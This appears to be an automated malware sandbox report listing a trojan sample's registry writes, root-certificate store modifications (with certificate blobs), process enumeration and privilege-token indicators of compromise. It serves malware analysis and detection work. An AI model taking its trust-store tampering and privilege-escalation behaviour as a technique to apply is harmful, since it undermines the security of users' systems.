Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0eb5224860cda01	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	4A83.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	4A83.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3036	3Ri93ez.exe
3036	3Ri93ez.exe
2644	AppLaunch.exe
2644	AppLaunch.exe
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1208	Explorer.EXE

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
468	Process not Found
468	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
3036	3Ri93ez.exe
3048	toolspub2.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	2644	AppLaunch.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeDebugPrivilege	2428	BB19.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeDebugPrivilege	2444	D30E.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
